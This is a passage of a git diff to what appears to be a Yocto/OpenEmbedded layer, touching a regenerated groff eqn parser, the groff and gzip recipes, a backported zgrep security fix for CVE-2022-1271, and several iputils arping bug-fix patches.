- { (yyval.b) = new font_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1755 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1770 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 48:
--#line 241 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 245 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new size_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1761 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1776 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 49:
--#line 243 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 247 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new hmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1767 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1782 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 50:
--#line 245 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 249 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new hmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1773 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1788 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 51:
--#line 247 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 251 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vmotion_box((yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1779 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1794 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 52:
--#line 249 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 253 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vmotion_box(-(yyvsp[-1].n), (yyvsp[0].b)); }
--#line 1785 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1800 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 53:
--#line 251 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 255 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].b)->set_spacing_type((yyvsp[-1].str)); (yyval.b) = (yyvsp[0].b); }
--#line 1791 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1806 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 54:
--#line 253 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 257 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = new vcenter_box((yyvsp[0].b)); }
--#line 1797 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1812 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 55:
--#line 255 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 259 "src/preproc/eqn/eqn.ypp"
- { (yyval.b) = make_special_box((yyvsp[-1].str), (yyvsp[0].b)); }
--#line 1803 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1818 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 56:
--#line 260 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 264 "src/preproc/eqn/eqn.ypp"
- {
- int n;
- if (sscanf((yyvsp[0].str), "%d", &n) == 1)
- (yyval.n) = n;
- a_delete (yyvsp[0].str);
- }
--#line 1814 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1829 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 57:
--#line 270 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 274 "src/preproc/eqn/eqn.ypp"
- { (yyval.pb) = new pile_box((yyvsp[0].b)); }
--#line 1820 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1835 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 58:
--#line 272 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 276 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-2].pb)->append((yyvsp[0].b)); (yyval.pb) = (yyvsp[-2].pb); }
--#line 1826 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1841 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 59:
--#line 277 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 281 "src/preproc/eqn/eqn.ypp"
- { (yyval.pb) = (yyvsp[-1].pb); }
--#line 1832 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1847 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 60:
--#line 279 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 283 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].pb)->set_space((yyvsp[-3].n)); (yyval.pb) = (yyvsp[-1].pb); }
--#line 1838 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1853 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 61:
--#line 284 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 288 "src/preproc/eqn/eqn.ypp"
- { (yyval.mb) = new matrix_box((yyvsp[0].col)); }
--#line 1844 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1859 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 62:
--#line 286 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 290 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].mb)->append((yyvsp[0].col)); (yyval.mb) = (yyvsp[-1].mb); }
--#line 1850 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1865 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 63:
--#line 291 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 295 "src/preproc/eqn/eqn.ypp"
- { (yyval.col) = new column((yyvsp[0].b)); }
--#line 1856 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1871 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 64:
--#line 293 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 297 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-2].col)->append((yyvsp[0].b)); (yyval.col) = (yyvsp[-2].col); }
--#line 1862 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1877 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 65:
--#line 298 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 302 "src/preproc/eqn/eqn.ypp"
- { (yyval.col) = (yyvsp[-1].col); }
--#line 1868 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1883 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 66:
--#line 300 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 304 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].col)->set_space((yyvsp[-3].n)); (yyval.col) = (yyvsp[-1].col); }
--#line 1874 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1889 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 67:
--#line 305 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 309 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1880 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1895 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 68:
--#line 307 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 311 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(LEFT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1886 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1901 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 69:
--#line 309 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 313 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(RIGHT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1892 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1907 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 70:
--#line 311 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 315 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1898 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1913 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 71:
--#line 315 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 319 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1904 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1919 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 72:
--#line 317 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 321 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1910 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1925 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 73:
--#line 322 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 326 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1916 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1931 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 74:
--#line 324 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 328 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = strsave("{"); }
--#line 1922 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1937 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 75:
--#line 326 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 330 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = strsave("}"); }
--#line 1928 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1943 "src/preproc/eqn/eqn.cpp"
- break;
-
-
--#line 1932 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1947 "src/preproc/eqn/eqn.cpp"
-+
- default: break;
- }
- /* User semantic actions sometimes alter yychar, and that requires
-@@ -2042,12 +2058,10 @@ yyerrlab:
- | yyerrorlab -- error raised explicitly by YYERROR. |
- `---------------------------------------------------*/
- yyerrorlab:
--
-- /* Pacify compilers like GCC when the user code never invokes
-- YYERROR and the label yyerrorlab therefore never appears in user
-- code. */
-- if (/*CONSTCOND*/ 0)
-- goto yyerrorlab;
-+ /* Pacify compilers when the user code never invokes YYERROR and the
-+ label yyerrorlab therefore never appears in user code. */
-+ if (0)
-+ YYERROR;
-
- /* Do not reclaim the symbols of the rule whose action triggered
- this YYERROR. */
-@@ -2109,6 +2123,7 @@ yyacceptlab:
- yyresult = 0;
- goto yyreturn;
-
-+
- /*-----------------------------------.
- | yyabortlab -- YYABORT comes here. |
- `-----------------------------------*/
-@@ -2116,6 +2131,7 @@ yyabortlab:
- yyresult = 1;
- goto yyreturn;
-
-+
- #if !defined yyoverflow || YYERROR_VERBOSE
- /*-------------------------------------------------.
- | yyexhaustedlab -- memory exhaustion comes here. |
-@@ -2126,6 +2142,10 @@ yyexhaustedlab:
- /* Fall through. */
- #endif
-
-+
-+/*-----------------------------------------------------.
-+| yyreturn -- parsing is finished, return the result. |
-+`-----------------------------------------------------*/
- yyreturn:
- if (yychar != YYEMPTY)
- {
-@@ -2155,5 +2175,5 @@ yyreturn:
- #endif
- return yyresult;
- }
--#line 329 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1903 */
-+#line 333 "src/preproc/eqn/eqn.ypp"
-
-diff --git a/src/preproc/eqn/eqn.hpp b/src/preproc/eqn/eqn.hpp
-index 32a32a5..9a092c1 100644
---- a/src/preproc/eqn/eqn.hpp
-+++ b/src/preproc/eqn/eqn.hpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2. */
-+/* A Bison parser, made by GNU Bison 3.4.1. */
-
- /* Bison interface for Yacc-like parsers in C
-
-- Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+ Inc.
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
-@@ -170,10 +171,9 @@ extern int yydebug;
-
- /* Value type. */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1906 */
-+#line 34 "src/preproc/eqn/eqn.ypp"
-
- char *str;
- box *b;
-@@ -182,9 +182,9 @@ union YYSTYPE
- int n;
- column *col;
-
--#line 186 "src/preproc/eqn/eqn.hpp" /* yacc.c:1906 */
--};
-+#line 186 "src/preproc/eqn/eqn.hpp"
-
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
diff --git a/src/preproc/eqn/eqn.ypp b/src/preproc/eqn/eqn.ypp
index fb318c3..b7b647e 100644
--- a/src/preproc/eqn/eqn.ypp
diff --git a/meta/recipes-extended/groff/groff_1.22.4.bb b/meta/recipes-extended/groff/groff_1.22.4.bb
index e398478349..f0e9eb6a8a 100644
--- a/meta/recipes-extended/groff/groff_1.22.4.bb
+++ b/meta/recipes-extended/groff/groff_1.22.4.bb
@@ -18,6 +18,9 @@ SRC_URI = "${GNU_MIRROR}/groff/groff-${PV}.tar.gz \
SRC_URI[md5sum] = "08fb04335e2f5e73f23ea4c3adbf0c5f"
SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1bad0293"
+# Remove at the next upgrade
+PR = "r1"
+
DEPENDS = "bison-native"
RDEPENDS_${PN} += "perl sed"
@@ -28,7 +31,14 @@ MULTILIB_SCRIPTS = "${PN}:${bindir}/gpinyin ${PN}:${bindir}/groffer ${PN}:${bind
EXTRA_OECONF = "--without-x --without-doc"
PARALLEL_MAKE = ""
-CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no'"
+CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no' PAGE=A4"
+
+# Delete these generated files since we depend on bison-native
+# and regenerate them. Do it deterministically (always).
+do_configure_prepend() {
+ rm -f ${S}/src/preproc/eqn/eqn.cpp
+ rm -f ${S}/src/preproc/eqn/eqn.hpp
+}
do_install_append() {
# Some distros have both /bin/perl and /usr/bin/perl, but we set perl location
@@ -52,6 +62,10 @@ do_install_append() {
rm -rf ${D}${bindir}/glilypond
rm -rf ${D}${libdir}/groff/glilypond
rm -rf ${D}${mandir}/man1/glilypond*
+
+ # not ship /usr/bin/grap2graph and its releated man files
+ rm -rf ${D}${bindir}/grap2graph
+ rm -rf ${D}${mandir}/man1/grap2graph*
}
do_install_append_class-native() {
diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
new file mode 100644
index 0000000000..046c95df47
--- /dev/null
+++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
@@ -0,0 +1,45 @@
+From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Mon, 4 Apr 2022 23:52:49 -0700
+Subject: [PATCH] zgrep: avoid exploit via multi-newline file names
+
+* zgrep.in: The issue with the old code is that with multiple
+newlines, the N-command will read the second line of input,
+then the s-commands will be skipped because it's not the end
+of the file yet, then a new sed cycle starts and the pattern
+space is printed and emptied. So only the last line or two get
+escaped. This patch makes sed read all lines into the pattern
+space and then do the escaping.
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ zgrep.in | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/zgrep.in b/zgrep.in
+index 3efdb52..d391291 100644
+--- a/zgrep.in
++++ b/zgrep.in
+@@ -222,9 +222,13 @@ do
+ '* | *'&'* | *'\'* | *'|'*)
+ i=$(printf '%s\n' "$i" |
+ sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
++ :start
++ $!{
++ N
++ b start
++ }
++ s/[&\|]/\\&/g
++ s/\n/\\n/g
+ ');;
+ esac
+ sed_script="s|^|$i:|"
diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb
index 9778e687e1..c558c21f10 100644
--- a/meta/recipes-extended/gzip/gzip_1.10.bb
+++ b/meta/recipes-extended/gzip/gzip_1.10.bb
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+"
SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \
file://run-ptest \
+ file://CVE-2022-1271.patch \
"
SRC_URI_append_class-target = " file://wrong-path-fix.patch"
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
new file mode 100644
index 0000000000..bf86115843
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
@@ -0,0 +1,79 @@
+From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001
+From: lac-0073 <61903197+lac-0073@users.noreply.github.com>
+Date: Mon, 26 Oct 2020 09:45:42 +0800
+Subject: [PATCH] arpping: make update neighbours work again
+
+The arping is using inconsistent sender_ip_addr and target_ip_addr in
+messages. This causes the client receiving the arp message not to update
+the arp table entries.
+
+The specific performance is as follows:
+
+There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the
+same IP subnet as eth0. This IP was originally used on another machine 1,
+and th IP needs to be changed back to the machine 1. When using the arping
+command to announce what ethernet address has IP 10.20.30.3, the arp table
+on machine 3 is not updated.
+
+Machine 3 original arp table:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Create interface eth0:0 on machine 1, and use the arping command to send arp
+packets. Expected outcome on machine 3:
+
+ 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Actual results on machine 3:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Fixes: https://github.com/iputils/iputils/issues/298
+Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339
+Signed-off-by: Aichun Li <liaichun@huawei.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098]
+Signed-off-by: Visa Hankala <visa@hankala.org>
+---
+ arping.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index a002786..53fdbb4 100644
+--- a/arping.c
++++ b/arping.c
+@@ -968,7 +968,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
++ if (ctl.source || ctl.gsrc.s_addr) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+@@ -979,12 +979,14 @@ int main(int argc, char **argv)
+ saddr.sin_port = htons(1025);
+ saddr.sin_addr = ctl.gdst;
+
+- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
+- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
+- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+- error(2, errno, "connect");
+- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
+- error(2, errno, "getsockname");
++ if (!ctl.unsolicited) {
++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
++ error(2, errno, "connect");
++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
++ error(2, errno, "getsockname");
++ }
+ ctl.gsrc = saddr.sin_addr;
+ }
+ close(probe_fd);
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
new file mode 100644
index 0000000000..8495178879
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
@@ -0,0 +1,39 @@
+From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 31 Jul 2019 21:28:12 +0100
+Subject: [PATCH] arping: revert partially - fix sent vs received packages
+ return value
+
+Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused regression. The
+arping -D needs return value evaluation that was the earlier default, in
+other cases the new return value should be correct.
+
+Addresses: https://github.com/iputils/iputils/issues/209
+See-also: https://github.com/void-linux/void-packages/issues/13304
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 77c9c56..2c87c15 100644
+--- a/arping.c
++++ b/arping.c
+@@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- rc |= (ctl->sent != ctl->received);
++ if (ctl->dad && ctl->quit_on_reply)
++ /* Duplicate address detection mode return value */
++ rc |= !(ctl->brd_sent != ctl->received);
++ else
++ rc |= (ctl->sent != ctl->received);
+ return rc;
+ }
+
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
new file mode 100644
index 0000000000..a5f40860dc
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
@@ -0,0 +1,39 @@
+From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 28 Aug 2019 20:05:22 +0100
+Subject: [PATCH] arping: fix -f quit on first reply regression
+
+When arping runs together with -f 'quit on first reply' and -w <timeout>
+'how long to wait for a reply' the command needs to exit if replies are not
+received after wait period. Notice that the exit in case of lost packages
+will be 1 signifying failure. Getting a reply results to 0 exit value.
+
+Addresses: https://bugs.debian.org/935946
+Reported-by: Lucas Nussbaum <lucas@debian.org>
+Addresses: https://github.com/iputils/iputils/issues/211
+Reported-by: Noah Meyerhans <noahm@debian.org>
+Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2c87c15..30884f6 100644
+--- a/arping.c
++++ b/arping.c
+@@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
++ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
++ (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
new file mode 100644
index 0000000000..ebd122c157
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
@@ -0,0 +1,37 @@
+From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001
+From: Petr Vorel <petr.vorel@gmail.com>
+Date: Sat, 7 Sep 2019 06:07:19 +0200
+Subject: [PATCH] arping: Fix comparison of different signedness warning
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare]
+ 768 | (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+
+Fixes: 1df5350 ("arping: fix -f quit on first reply regression")
+Reference: https://github.com/iputils/iputils/pull/212
+Acked-by: Sami Kerola <kerolasa@iki.fi>
+Signed-off-by: Petr Vorel <petr.vorel@gmail.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2d05728..88319cd 100644
+--- a/arping.c
++++ b/arping.c
+@@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl)
+ }
+ total_expires += exp;
+ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < total_expires)) {
++ (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
new file mode 100644
index 0000000000..923e06e30b
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
@@ -0,0 +1,45 @@
+From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 8 Feb 2020 14:12:18 +0000
+Subject: [PATCH] arping: return success when unsolicited ARP mode destination
+ does not answer
+
+Manual page is making promise answers are not expected when -U (or -A)
+option is in use. Either I am looking wrong or this has been broken since
+at the beginning of git history.
+
+Addresses: https://github.com/iputils/iputils/issues/247
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 996cf2b..5180ae0 100644
+--- a/arping.c
++++ b/arping.c
+@@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- if (ctl->dad && ctl->quit_on_reply)
++ if (ctl->unsolicited)
++ /* nothing */;
++ else if (ctl->dad && ctl->quit_on_reply)
+ /* Duplicate address detection mode return value */
+ rc |= !(ctl->brd_sent != ctl->received);
+ else
+@@ -943,7 +945,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (ctl.source || ctl.gsrc.s_addr) {
++ if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
new file mode 100644
